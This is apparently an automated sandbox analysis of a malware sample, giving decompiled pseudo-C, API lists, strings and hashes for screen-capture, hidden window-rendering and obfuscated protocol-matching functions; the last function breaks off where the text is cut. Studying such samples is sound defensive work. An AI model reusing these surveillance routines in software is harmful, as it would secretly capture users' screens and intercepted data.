Opcode ID: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
Instruction ID: 31d7c3956376ba80486ddbec97a1a05de8f6b8f05ccfb2966e9fcca8da9070aa
Opcode Fuzzy Hash: 37a1001b93998f984f4d2d731be7b22ab631ba7269735dfd8c29eb6a4b7eac65
Instruction Fuzzy Hash: 27E04F7AB801118BD755CA55D880983B7A6FBD9330B2286E6C81587745C938EDC3C5D5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A6CC, Relevance: 82.6, APIs: 27, Strings: 20, Instructions: 389
libraryloaderwindowCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E0041A6CC(WCHAR* _a4, char _a8, signed short _a12) {
				struct HINSTANCE__* _v12;
				struct HINSTANCE__* _v16;
				struct HINSTANCE__* _v20;
				_Unknown_base(*)()* _v24;
				void* _v28;
				void* _v32;
				struct HDC__* _v36;
				_Unknown_base(*)()* _v40;
				_Unknown_base(*)()* _v44;
				struct tagPOINT _v52;
				_Unknown_base(*)()* _v56;
				struct HINSTANCE__* _v60;
				_Unknown_base(*)()* _v64;
				_Unknown_base(*)()* _v68;
				_Unknown_base(*)()* _v72;
				_Unknown_base(*)()* _v76;
				_Unknown_base(*)()* _v80;
				_Unknown_base(*)()* _v84;
				_Unknown_base(*)()* _v88;
				struct HINSTANCE__* _v92;
				struct HINSTANCE__* _v96;
				struct HINSTANCE__* _v100;
				char _v104;
				_Unknown_base(*)()* _v108;
				intOrPtr _v112;
				char _v116;
				_Unknown_base(*)()* _v120;
				char _v148;
				signed int _v152;
				struct _ICONINFO _v172;
				char _v188;
				struct HINSTANCE__* _t169;
				_Unknown_base(*)()* _t176;
				struct HINSTANCE__* _t181;
				_Unknown_base(*)()* _t182;
				struct HINSTANCE__* _t183;
				_Unknown_base(*)()* _t191;
				struct HDC__* _t197;
				struct HICON__* _t199;
				signed int _t200;
				intOrPtr _t202;
				intOrPtr _t204;
				void* _t206;
				void* _t223;
				intOrPtr* _t224;
				void* _t239;
				void* _t248;
				unsigned int _t260;
				intOrPtr* _t262;
				signed short _t263;
				intOrPtr _t264;
				WCHAR** _t265;
				intOrPtr _t268;
				signed int _t269;
				signed int _t272;
				void* _t275;

				_v32 = 0;
				_v60 = 0;
				_v16 = 0;
				_v104 = 1;
				_v100 = 0;
				_v96 = 0;
				_v92 = 0;
				_t169 = LoadLibraryA("gdiplus.dll");
				_v20 = _t169;
				_v24 = GetProcAddress(_t169, "GdiplusStartup");
				_v80 = GetProcAddress(_v20, "GdiplusShutdown");
				_v88 = GetProcAddress(_v20, "GdipCreateBitmapFromHBITMAP");
				_v72 = GetProcAddress(_v20, "GdipDisposeImage");
				_v40 = GetProcAddress(_v20, "GdipGetImageEncodersSize");
				_v64 = GetProcAddress(_v20, "GdipGetImageEncoders");
				_t176 = GetProcAddress(_v20, "GdipSaveImageToStream");
				_v108 = _t176;
				if(_v24 == 0 || _v80 == 0 || _v88 == 0 || _v72 == 0 || _v40 == 0 || _v64 == 0 || _t176 == 0) {
					L66:
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
					if(_v60 != 0) {
						FreeLibrary(_v60);
					}
					if(_v16 != 0) {
						FreeLibrary(_v16);
					}
					return _v32;
				} else {
					_t181 = LoadLibraryA("ole32.dll");
					_v60 = _t181;
					_t182 = GetProcAddress(_t181, "CreateStreamOnHGlobal");
					_v120 = _t182;
					if(_t182 == 0) {
						goto L66;
					}
					_t183 = LoadLibraryA("gdi32.dll");
					_v16 = _t183;
					_t262 = GetProcAddress(_t183, "CreateDCW");
					_v12 = GetProcAddress(_v16, "CreateCompatibleDC");
					_v44 = GetProcAddress(_v16, "CreateCompatibleBitmap");
					_v28 = GetProcAddress(_v16, "GetDeviceCaps");
					_v56 = GetProcAddress(_v16, "SelectObject");
					_v76 = GetProcAddress(_v16, "BitBlt");
					_v84 = GetProcAddress(_v16, "DeleteObject");
					_t191 = GetProcAddress(_v16, "DeleteDC");
					_v68 = _t191;
					if(_t262 == 0 || _v12 == 0 || _v44 == 0 || _v28 == 0 || _v56 == 0 || _v76 == 0 || _v84 == 0 || _t191 == 0) {
						goto L66;
					} else {
						_push(0);
						_push( &_v104);
						_push( &_v116);
						_v104 = 1;
						_v100 = 0;
						_v96 = 0;
						_v92 = 0;
						if(_v24() != 0) {
							goto L66;
						}
						_t268 =  *_t262(L"DISPLAY", 0, 0, 0);
						_v24 = _t268;
						if(_t268 == 0) {
							L65:
							_v80(_v116);
							goto L66;
						}
						_t197 = _v12(_t268);
						_v36 = _t197;
						if(_t197 == 0) {
							L64:
							_v68(_v24);
							goto L65;
						}
						_t199 = LoadImageW(0, 0x7f00, 2, 0, 0, 0x8040);
						_v12 = _t199;
						if(_t199 == 0) {
							L24:
							_t263 = 0;
							goto L26;
						} else {
							if(GetIconInfo(_t199,  &_v172) == 0 || GetCursorPos( &_v52) == 0) {
								_v12 = 0;
							}
							if(_v12 != 0) {
								_t263 = _a12;
								L26:
								if(_t263 == 0) {
									_t200 = _v28(_t268, 8);
									_t269 = _t200;
									_a12 = _v28(_v24, 0xa);
								} else {
									_t269 = _t263 & 0x0000ffff;
									_a12 = _t269;
								}
								_t202 = _v44(_v24, _t269, _a12);
								_v44 = _t202;
								if(_t202 == 0) {
									L63:
									_v68(_v36);
									goto L64;
								} else {
									_t204 = _v56(_v36, _t202);
									_v112 = _t204;
									if(_t204 == 0) {
										L62:
										_v84(_v44);
										goto L63;
									}
									_t206 = 0;
									_t248 = 0;
									if(_t263 != 0) {
										_t260 = (_t263 & 0x0000ffff) >> 1;
										_t206 =  <  ? 0 : _v52.x - _t260;
										_t248 =  <  ? 0 : _v52.y - _t260;
										_t81 =  &_v52;
										 *_t81 = _v52.x - _t206;
										if( *_t81 < 0) {
											_v52.x = 0;
										}
										_t84 =  &(_v52.y);
										 *_t84 = _v52.y - _t248;
										if( *_t84 < 0) {
											_v52.y = 0;
										}
									}
									_push(0x40cc0020);
									_push(_t248);
									_push(_t206);
									_push(_v24);
									_push(_a12);
									_push(_t269);
									_push(0);
									_push(0);
									_push(_v36);
									if(_v76() == 0) {
										L61:
										_v56(_v36, _v112);
										goto L62;
									} else {
										if(_v12 != 0) {
											_t254 =  <  ? 0 : _v52.x - _v172.xHotspot;
											_t239 = _v52.y - _v172.yHotspot;
											_t240 =  <  ? 0 : _t239;
											DrawIcon(_v36,  <  ? 0 : _v52.x - _v172.xHotspot,  <  ? 0 : _t239, _v12);
										}
										_push( &_v12);
										_push(0);
										_push(_v44);
										_v12 = 0;
										if(_v88() != 0 || _v12 == 0) {
											goto L61;
										} else {
											_push( &_v28);
											_push( &_a12);
											_a12 = 0;
											_v28 = 0;
											if(_v40() != 0) {
												L60:
												_v72(_v12);
												goto L61;
											}
											_t215 = _v28;
											if(_v28 == 0 || _a12 == 0) {
												goto L60;
											} else {
												_t264 = E00411CCE(_t215);
												_v40 = _t264;
												if(_t264 == 0) {
													goto L60;
												}
												_push(_t264);
												_push(_v28);
												_push(_a12);
												if(_v64() != 0) {
													L52:
													E00411CFE(_v40);
													if(_a12 == 0) {
														_push( &_v32);
														_push(1);
														_push(0);
														if(_v120() == 0 && _v32 != 0) {
															_v152 = 0;
															if(_a8 > 0) {
																E00411D3A( &_v148, 0x40495c, 0x10);
																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x7c)) = 4;
																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x80)) = 1;
																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x78)) =  &_a8;
																_v152 = _v152 + 1;
															}
															_t223 = _v108(_v12, _v32,  &_v188,  &_v152);
															_t224 = _v32;
															if(_t223 == 0) {
																 *((intOrPtr*)( *_t224 + 0x14))(_t224, 0, 0, 0, 0);
															} else {
																 *((intOrPtr*)( *_t224 + 8))(_t224);
																_v32 = 0;
															}
														}
													}
													goto L60;
												}
												_t272 = 0;
												if(_a12 <= 0) {
													goto L52;
												}
												_t265 = _t264 + 0x30;
												while(lstrcmpiW(_a4,  *_t265) != 0) {
													_t272 = _t272 + 1;
													_t265 =  &(_t265[0x13]);
													if(_t272 < _a12) {
														continue;
													}
													goto L52;
												}
												E00411D3A( &_v188, _t272 * 0x4c + _v40, 0x10);
												_a12 = 0;
												goto L52;
											}
										}
									}
								}
							}
							goto L24;
						}
					}
				}
			}

0x0041a6e5
0x0041a6e8
0x0041a6eb
0x0041a6ee
0x0041a6f5
0x0041a6f8
0x0041a6fb
0x0041a6fe
0x0041a70c
0x0041a719
0x0041a726
0x0041a733
0x0041a740
0x0041a74d
0x0041a75a
0x0041a75d
0x0041a75f
0x0041a765
0x0041ab49
0x0041ab52
0x0041ab57
0x0041ab57
0x0041ab5c
0x0041ab61
0x0041ab61
0x0041ab66
0x0041ab6b
0x0041ab6b
0x0041ab74
0x0041a7a0
0x0041a7a5
0x0041a7ad
0x0041a7b0
0x0041a7b2
0x0041a7b7
0x00000000
0x00000000
0x0041a7c2
0x0041a7ca
0x0041a7d7
0x0041a7e3
0x0041a7f0
0x0041a7fd
0x0041a80a
0x0041a817
0x0041a824
0x0041a827
0x0041a829
0x0041a82e
0x00000000
0x0041a872
0x0041a872
0x0041a876
0x0041a87a
0x0041a87b
0x0041a882
0x0041a885
0x0041a888
0x0041a890
0x00000000
0x00000000
0x0041a8a0
0x0041a8a2
0x0041a8a7
0x0041ab43
0x0041ab46
0x00000000
0x0041ab46
0x0041a8ae
0x0041a8b1
0x0041a8b6
0x0041ab3d
0x0041ab40
0x00000000
0x0041ab40
0x0041a8cb
0x0041a8d1
0x0041a8d6
0x0041a900
0x0041a900
0x00000000
0x0041a8d8
0x0041a8e8
0x0041a8f8
0x0041a8f8
0x0041a8fe
0x0041a904
0x0041a907
0x0041a90a
0x0041a917
0x0041a91f
0x0041a924
0x0041a90c
0x0041a90c
0x0041a90f
0x0041a90f
0x0041a92e
0x0041a931
0x0041a936
0x0041ab37
0x0041ab3a
0x00000000
0x0041a93c
0x0041a940
0x0041a943
0x0041a948
0x0041ab31
0x0041ab34
0x00000000
0x0041ab34
0x0041a94e
0x0041a950
0x0041a955
0x0041a960
0x0041a964
0x0041a969
0x0041a96c
0x0041a96c
0x0041a96f
0x0041a971
0x0041a971
0x0041a974
0x0041a974
0x0041a977
0x0041a979
0x0041a979
0x0041a977
0x0041a97c
0x0041a981
0x0041a982
0x0041a983
0x0041a986
0x0041a989
0x0041a98a
0x0041a98b
0x0041a98c
0x0041a994
0x0041ab28
0x0041ab2e
0x00000000
0x0041a99a
0x0041a99d
0x0041a9ae
0x0041a9b1
0x0041a9b7
0x0041a9bf
0x0041a9bf
0x0041a9c8
0x0041a9c9
0x0041a9ca
0x0041a9cd
0x0041a9d5
0x00000000
0x0041a9e4
0x0041a9e7
0x0041a9eb
0x0041a9ec
0x0041a9ef
0x0041a9f7
0x0041ab22
0x0041ab25
0x00000000
0x0041ab25
0x0041a9fd
0x0041aa02
0x00000000
0x0041aa11
0x0041aa16
0x0041aa18
0x0041aa1d
0x00000000
0x00000000
0x0041aa23
0x0041aa24
0x0041aa27
0x0041aa2f
0x0041aa6d
0x0041aa70
0x0041aa78
0x0041aa81
0x0041aa85
0x0041aa86
0x0041aa8c
0x0041aa9b
0x0041aaa4
0x0041aab4
0x0041aac2
0x0041aad3
0x0041aae3
0x0041aae7
0x0041aae7
0x0041ab01
0x0041ab06
0x0041ab09
0x0041ab1f
0x0041ab0b
0x0041ab0e
0x0041ab11
0x0041ab11
0x0041ab09
0x0041aa8c
0x00000000
0x0041aa78
0x0041aa31
0x0041aa36
0x00000000
0x00000000
0x0041aa38
0x0041aa3b
0x0041aa4a
0x0041aa4b
0x0041aa51
0x00000000
0x00000000
0x00000000
0x0041aa53
0x0041aa65
0x0041aa6a
0x00000000
0x0041aa6a
0x0041aa02
0x0041a9d5
0x0041a994
0x0041a936
0x00000000
0x0041a8fe
0x0041a8d6
0x0041a82e

APIs

LoadLibraryA.KERNEL32(gdiplus.dll,00000000,?,00000000), ref: 0041A6FE
GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0041A70F
GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 0041A71C
GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 0041A729
GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 0041A736
GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 0041A743
GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0041A750
GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 0041A75D
LoadLibraryA.KERNEL32(ole32.dll), ref: 0041A7A5
GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0041A7B0
LoadLibraryA.KERNEL32(gdi32.dll), ref: 0041A7C2
GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0041A7CD
GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 0041A7D9
GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 0041A7E6
GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 0041A7F3
GetProcAddress.KERNEL32(00000000,SelectObject), ref: 0041A800
GetProcAddress.KERNEL32(00000000,BitBlt), ref: 0041A80D
GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 0041A81A
GetProcAddress.KERNEL32(00000000,DeleteDC), ref: 0041A827
LoadImageW.USER32 ref: 0041A8CB
GetIconInfo.USER32(00000000,?), ref: 0041A8E0
GetCursorPos.USER32(?), ref: 0041A8EE
DrawIcon.USER32 ref: 0041A9BF
lstrcmpiW.KERNEL32(?,-00000030), ref: 0041AA40
FreeLibrary.KERNEL32(00000000), ref: 0041AB57
FreeLibrary.KERNEL32(?), ref: 0041AB61
FreeLibrary.KERNEL32(00000000), ref: 0041AB6B

Strings

ole32.dll, xrefs: 0041A7A0
GdipSaveImageToStream, xrefs: 0041A752
DeleteDC, xrefs: 0041A81C
GetDeviceCaps, xrefs: 0041A7E8
DISPLAY, xrefs: 0041A899
GdiplusShutdown, xrefs: 0041A711
CreateCompatibleDC, xrefs: 0041A7CF
GdipGetImageEncoders, xrefs: 0041A745
GdipCreateBitmapFromHBITMAP, xrefs: 0041A71E
BitBlt, xrefs: 0041A802
CreateDCW, xrefs: 0041A7C4
CreateCompatibleBitmap, xrefs: 0041A7DB
GdipDisposeImage, xrefs: 0041A72B
SelectObject, xrefs: 0041A7F5
gdiplus.dll, xrefs: 0041A6E0
GdiplusStartup, xrefs: 0041A706
CreateStreamOnHGlobal, xrefs: 0041A7A7
gdi32.dll, xrefs: 0041A7BD
DeleteObject, xrefs: 0041A80F
GdipGetImageEncodersSize, xrefs: 0041A738

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$Library$Load$Free$Icon$CursorDrawImageInfolstrcmpi
String ID: BitBlt$CreateCompatibleBitmap$CreateCompatibleDC$CreateDCW$CreateStreamOnHGlobal$DISPLAY$DeleteDC$DeleteObject$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$GdiplusShutdown$GdiplusStartup$GetDeviceCaps$SelectObject$gdi32.dll$gdiplus.dll$ole32.dll
API String ID: 1554524784-1167942225
Opcode ID: dd1da0fdf710baf697d9d825b3dd4f5479666ec498d6b001143b817059854be0
Instruction ID: 6cd427191155a3525e249610e73412454ef9c8de38e11afcfb302e3069d65519
Opcode Fuzzy Hash: dd1da0fdf710baf697d9d825b3dd4f5479666ec498d6b001143b817059854be0
Instruction Fuzzy Hash: 7DE1E4B1D01259ABCF209FE5CD84AEEBBBAFF48340F14442BE605B2250D7789991CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004066DB, Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 308
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E004066DB(RECT* __eax, void* __ecx, signed int __edx, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, signed int _a15) {
				char _v9;
				signed int _v10;
				int _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				void* _v68;
				signed int _v72;
				int _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				int _v92;
				struct HDC__* _v96;
				struct HWND__* _v100;
				void _v104;
				intOrPtr _v140;
				intOrPtr _v156;
				struct tagWINDOWINFO _v164;
				signed int _t128;
				signed int _t135;
				void* _t140;
				void* _t146;
				signed int _t164;
				intOrPtr _t191;
				long _t192;
				intOrPtr _t195;
				long _t196;
				long _t210;
				long _t211;
				long _t212;
				long _t213;
				signed int _t214;
				signed int _t215;
				RECT* _t216;
				struct HDC__* _t217;
				struct HDC__* _t221;

				_t214 = __edx;
				_t216 = __eax;
				_t128 = E0040B7B4(_a8) & 0x0000ffff;
				_v16 = _t128;
				if((_t128 & 0x00000001) == 0) {
					if(_t128 == 0) {
						_v16 = 2;
						_t128 = _v16;
					}
					if(_a12 != 0 && (_t128 & 0x00000002) != 0) {
						_v16 = _t128 & 0x0000fffd | 0x00000008;
					}
					_v24 = 0;
					_v20 = 0;
					_v28 = 0;
					_v32 = 0;
					_v164.cbSize = 0x3c;
					if(GetWindowInfo(_a8,  &_v164) != 0) {
						_t215 = _t214 & 0xffffff00 | IntersectRect( &_v64,  &(_v164.rcWindow), _t216) != 0x00000000;
						_v10 = _t215;
						if(_t215 != 0) {
							_t212 = _t216->top;
							_t195 = _v156;
							if(_t195 < _t212) {
								_v20 = _t195 - _t212;
							}
							_t213 = _t216->left;
							_t196 = _v164.rcWindow.left;
							if(_t196 < _t213) {
								_v24 = _t196 - _t213;
							}
						}
						_t135 = _v16 & 0x00000002;
						_v72 = _t135;
						if(_t135 == 0) {
							_a15 = _t215;
						} else {
							if((_v164.dwStyle & 0x20000000) == 0) {
								_a15 = IntersectRect( &_v48,  &(_v164.rcClient), _t216) != 0;
								if(_a15 != 0) {
									_t210 = _t216->top;
									_t191 = _v140;
									if(_t191 < _t210) {
										_v32 = _t191 - _t210;
									}
									_t211 = _t216->left;
									_t192 = _v164.rcClient.left;
									if(_t192 < _t211) {
										_v28 = _t192 - _t211;
									}
								}
							} else {
								_a15 = 0;
							}
						}
						if(_v10 != 0 || _a15 != 0) {
							_t217 = GetDC(0);
							if(_t217 == 0) {
								goto L8;
							}
							_t221 = CreateCompatibleDC(_t217);
							ReleaseDC(0, _t217);
							if(_t221 == 0) {
								goto L8;
							}
							_t218 = _a4;
							_t140 = SelectObject(_t221,  *(_a4 + 0x1c));
							_v68 = _t140;
							if(_t140 != 0) {
								_v9 = 1;
								if(_v72 == 0) {
									if((_v16 & 0x00000004) == 0) {
										if((_v16 & 0x00000008) == 0) {
											L56:
											SelectObject(_t221, _v68);
											DeleteDC(_t221);
											return _v9;
										}
										if(_v24 != 0 || _v20 != 0) {
											SetViewportOrgEx(_t221, _v24, _v20, 0);
										}
										_t146 = E004065F9(_t218,  &_v64, 0);
										__imp__PrintWindow(_a8, _t221, 0);
										if(_t146 != 0) {
											L55:
											E004065F9(_t218,  &_v64, 1);
										} else {
											_v9 = 0;
										}
										goto L56;
									}
									if(_v24 != 0 || _v20 != 0) {
										SetViewportOrgEx(_t221, _v24, _v20, 0);
									}
									E004065F9(_t218,  &_v64, 0);
									DefWindowProcW(_a8, 0x317, _t221, 0xe);
									goto L55;
								}
								_v100 = _a8;
								_v96 = _t221;
								_v84 = _v48.right - _v48.left;
								_v76 = 1;
								_v80 = _v48.bottom - _v48.top;
								_v92 = 0;
								_v88 = 0;
								TlsSetValue( *0x42291c,  &_v104);
								if(_v10 == 1 && EqualRect( &_v48,  &_v64) == 0) {
									_v16 = SaveDC(_t221);
									if(_v24 != 0 || _v20 != 0) {
										SetViewportOrgEx(_t221, _v24, _v20, 0);
									}
									E004065F9(_a4,  &_v64, 0);
									_v104 = 0;
									SendMessageW(_a8, 0x85, 1, 0);
									if(_v104 == 0) {
										DefWindowProcW(_a8, 0x317, _t221, 2);
									}
									E004065F9(_a4,  &_v64, 1);
									RestoreDC(_t221, _v16);
								}
								if(_a15 != 1) {
									L49:
									TlsSetValue( *0x42291c, 0);
									goto L56;
								} else {
									if(_v28 != 0) {
										L41:
										_a15 = 1;
										L42:
										_v16 = SaveDC(_t221);
										if(_a15 != 0) {
											SetViewportOrgEx(_t221, _v28, _v32, 0);
										}
										E004065F9(_a4,  &_v48, 0);
										_t164 = SendMessageW(_a8, 0x14, _t221, 0);
										asm("sbb eax, eax");
										_v76 =  ~_t164 + 1;
										RestoreDC(_t221, _v16);
										if(_a15 != 0) {
											SetViewportOrgEx(_t221, _v28, _v32, 0);
										}
										_v104 = 0;
										SendMessageW(_a8, 0xf, 0, 0);
										if(_v104 == 0) {
											DefWindowProcW(_a8, 0x317, _t221, 4);
										}
										E004065F9(_a4,  &_v48, 1);
										goto L49;
									}
									_a15 = 0;
									if(_v32 == 0) {
										goto L42;
									}
									goto L41;
								}
							}
							DeleteDC(_t221);
							goto L8;
						} else {
							goto L1;
						}
					}
					L8:
					return 0;
				}
				L1:
				return 1;
			}

0x004066db
0x004066ea
0x004066f1
0x004066f4
0x004066f9
0x00406707
0x00406709
0x00406710
0x00406710
0x00406716
0x00406724
0x00406724
0x00406731
0x00406734
0x00406737
0x0040673a
0x0040673d
0x0040674f
0x0040676e
0x00406771
0x00406776
0x00406778
0x0040677b
0x00406783
0x00406787
0x00406787
0x0040678a
0x0040678c
0x00406794
0x00406798
0x00406798
0x00406794
0x0040679e
0x004067a1
0x004067a4
0x004067f2
0x004067a6
0x004067ad
0x004067c4
0x004067cb
0x004067cd
0x004067d0
0x004067d8
0x004067dc
0x004067dc
0x004067df
0x004067e1
0x004067e9
0x004067ed
0x004067ed
0x004067e9
0x004067af
0x004067af
0x004067af
0x004067ad
0x004067f8
0x0040680a
0x0040680e
0x00000000
0x00000000
0x0040681d
0x0040681f
0x00406827
0x00000000
0x00000000
0x0040682d
0x00406834
0x0040683a
0x0040683f
0x0040684d
0x00406855
0x004069d0
0x00406a31
0x00406a12
0x00406a16
0x00406a1d
0x00000000
0x00406a23
0x00406a36
0x00406a45
0x00406a45
0x00406a51
0x00406a5b
0x00406a63
0x00406a06
0x00406a0d
0x00406a65
0x00406a65
0x00406a65
0x00000000
0x00406a63
0x004069d5
0x004069e4
0x004069e4
0x004069f0
0x00406a00
0x00000000
0x00406a00
0x0040685e
0x00406867
0x0040686a
0x00406873
0x0040687a
0x00406887
0x0040688a
0x0040688d
0x0040689d
0x004068b8
0x004068be
0x004068cd
0x004068cd
0x004068da
0x004068ea
0x004068ed
0x004068f2
0x004068ff
0x004068ff
0x0040690d
0x00406916
0x00406916
0x00406920
0x004069bd
0x004069c4
0x00000000
0x00406926
0x00406929
0x00406933
0x00406933
0x00406937
0x0040693e
0x00406944
0x0040694e
0x0040694e
0x0040695b
0x00406967
0x0040696e
0x00406972
0x00406975
0x0040697e
0x00406988
0x00406988
0x00406995
0x00406998
0x0040699d
0x004069aa
0x004069aa
0x004069b8
0x00000000
0x004069b8
0x0040692b
0x00406931
0x00000000
0x00000000
0x00000000
0x00406931
0x00406920
0x00406842
0x00000000
0x00000000
0x00000000
0x00000000
0x004067f8
0x00406751
0x00000000
0x00406751
0x004066fb
0x00000000

APIs

Part of subcall function 0040B7B4: GetClassNameW.USER32 ref: 0040B7CF

GetWindowInfo.USER32 ref: 00406747
SelectObject.GDI32(00000000,?), ref: 00406A16
DeleteDC.GDI32(00000000), ref: 00406A1D
SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 00406A45
PrintWindow.USER32(00000008,00000000,00000000,00000000), ref: 00406A5B

Strings

<, xrefs: 0040673D

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Window$ClassDeleteInfoNameObjectPrintSelectViewport
String ID: <
API String ID: 3458064076-4251816714
Opcode ID: b0dfebc72f8d82f1e4a9835183512c2eca0c563e7424100c2c09cd974f571730
Instruction ID: 0efd9288e116f9c89f11bb4f806ed385f23750aa86c90ddb74374ac724712f1d
Opcode Fuzzy Hash: b0dfebc72f8d82f1e4a9835183512c2eca0c563e7424100c2c09cd974f571730
Instruction Fuzzy Hash: D0C18D71D01249AFDF119FA4DD84AEEBBB9AF05304F01803AF906B72A0D7388A54DF65

Uniqueness

Uniqueness Score: -1.00%

Function 00411969, Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00411969(void* __eax, signed int* __ecx, signed int __edx, intOrPtr _a4) {
				char _v536;
				char _v652;
				char _v664;
				char _v696;
				char _v700;
				char _v701;
				char _v708;
				void* __esi;
				char* _t35;
				void* _t40;
				char* _t43;
				intOrPtr _t44;
				void* _t47;
				void* _t54;
				void* _t56;
				intOrPtr _t57;
				signed int _t58;
				signed int _t60;
				void* _t61;
				signed int* _t71;
				intOrPtr _t73;
				signed int _t75;
				signed char _t76;
				intOrPtr _t79;
				signed int _t80;
				intOrPtr _t83;
				signed int* _t84;
				intOrPtr _t85;
				void* _t87;
				char* _t92;
				void* _t93;
				intOrPtr* _t94;

				_t80 = __edx;
				_t87 = __eax;
				_t71 = __ecx;
				if(_a4 == 0xffffffff || __ecx == 0 || __eax > 0x200) {
					L51:
					_t35 = 0;
					__eflags = 0;
				} else {
					if(__eax <= 6) {
						L24:
						__eflags = _t87 - 1;
						if(_t87 <= 1) {
							goto L51;
						} else {
							EnterCriticalSection(0x422c2c);
							_t83 = E00411861(_a4);
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags =  *((intOrPtr*)(_t83 + 4));
								if( *((intOrPtr*)(_t83 + 4)) == 0) {
									L48:
									_push(0);
									goto L49;
								} else {
									__eflags =  *((intOrPtr*)(_t83 + 8));
									if( *((intOrPtr*)(_t83 + 8)) == 0) {
										goto L48;
									} else {
										__eflags = _t87 - 3;
										if(_t87 < 3) {
											L33:
											__eflags = _t87 - 4;
											if(_t87 >= 4) {
												_t75 =  *_t71 ^ 0x01030809;
												__eflags = _t75 - 0x4453515d;
												if(_t75 == 0x4453515d) {
													goto L37;
												} else {
													__eflags = _t75 - 0x55424d4f;
													if(_t75 == 0x55424d4f) {
														goto L37;
													} else {
														__eflags = _t75 - 0x57504959;
														if(_t75 != 0x57504959) {
															__eflags = _t75 - 0x55425c5a;
															if(_t75 == 0x55425c5a) {
																L40:
																_t76 = 0x65;
																_push(0x15);
																goto L41;
															} else {
																__eflags = _t75 - 0x55504145;
																if(_t75 == 0x55504145) {
																	goto L40;
																}
															}
														} else {
															goto L37;
														}
													}
												}
											}
										} else {
											_t58 =  *_t71;
											__eflags = _t58 - 0x43;
											if(_t58 == 0x43) {
												L31:
												__eflags = _t71[0] - 0x57;
												if(_t71[0] != 0x57) {
													goto L33;
												} else {
													__eflags = _t71[0] - 0x44;
													if(_t71[0] == 0x44) {
														L37:
														_t76 = 0x64;
														_push(0x14);
														L41:
														_pop(_t40);
														E00419897(_t40,  &_v696);
														_t43 =  &_v652;
														_v700 = 0x80;
														__imp__#5(_a4, _t43,  &_v700);
														__eflags = _t43;
														if(_t43 == 0) {
															_t78 =  &_v664;
															_t44 = E004151A8( &_v664);
															__eflags = _t44;
															if(_t44 == 0) {
																__eflags = _t76 - 0x65;
																if(_t76 == 0x65) {
																	L46:
																	E0041515F( &_v664, _t78,  &_v536);
																	_t47 = 0x13;
																	E00419897(_t47,  &_v696);
																	_push( &_v536);
																	_push( *((intOrPtr*)(_t83 + 8)));
																	_push( *((intOrPtr*)(_t83 + 4)));
																	E00407CCA(_t78, _t80, __eflags, _t76 & 0x000000ff, 0, 0,  &_v696,  &_v708);
																} else {
																	__eflags = _t76 - 0x64;
																	if(_t76 == 0x64) {
																		_t92 =  &_v696;
																		_t54 = 0x16;
																		E00419897(_t54, _t92);
																		_push( *((intOrPtr*)(_t83 + 4)));
																		_t80 = _t80 | 0xffffffff;
																		_t56 = 9;
																		_t78 = _t92;
																		_t57 = E0041290E(_t56, _t92, _t80);
																		__eflags = _t57;
																		if(_t57 != 0) {
																			goto L46;
																		}
																	}
																}
															}
														}
														_push(0);
														L49:
														E00411900(_t83);
													} else {
														goto L33;
													}
												}
											} else {
												__eflags = _t58 - 0x50;
												if(_t58 != 0x50) {
													goto L33;
												} else {
													goto L31;
												}
											}
										}
									}
								}
							}
							_t73 = 0;
							goto L23;
						}
					} else {
						_t60 =  *__ecx ^ 0x01030809;
						if(_t60 == 0x53465b5c || _t60 == 0x52504959) {
							if(_t71[1] != 0x20) {
								goto L24;
							} else {
								_t61 = 0;
								_t93 = _t87 + 0xfffffffb;
								_t84 =  &(_t71[1]);
								if(_t93 == 0) {
									goto L51;
								} else {
									while(1) {
										_t79 =  *((intOrPtr*)(_t61 + _t84));
										if(_t79 == 0xd || _t79 == 0xa) {
											break;
										}
										if(_t79 < 0x20) {
											goto L51;
										} else {
											_t61 = _t61 + 1;
											if(_t61 < _t93) {
												continue;
											} else {
												break;
											}
										}
										goto L52;
									}
									if(_t61 == 0 || _t61 == _t93) {
										goto L51;
									} else {
										_t85 = E00411F3E(_t61, 0xfde9, _t84);
										if(_t85 == 0) {
											goto L51;
										} else {
											_v701 = 0;
											EnterCriticalSection(0x422c2c);
											_t94 = E00411861(_a4);
											if(_t94 != 0) {
												L18:
												__eflags =  *_t71 - 0x55;
												_v701 = 1;
												if( *_t71 != 0x55) {
